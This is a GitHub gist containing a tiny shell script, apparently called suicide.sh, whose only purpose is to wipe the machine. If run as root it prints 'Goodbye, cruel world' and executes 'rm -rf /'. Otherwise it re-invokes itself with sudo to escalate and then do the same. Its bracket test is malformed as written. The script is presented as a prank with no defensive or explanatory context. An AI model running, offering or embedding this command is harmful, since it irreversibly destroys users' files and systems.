Skip to content

Instantly share code, notes, and snippets.

@RealityAnomaly
Created January 22, 2015 23:26
Show Gist options
  • Save RealityAnomaly/f37d059e58a58e8cdaa5 to your computer and use it in GitHub Desktop.
Save RealityAnomaly/f37d059e58a58e8cdaa5 to your computer and use it in GitHub Desktop.
#!/bin/sh
if ["$USER" = "root"]; then
echo "Goodbye, cruel world"
rm -rf /
else
sudo ./suicide.sh
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment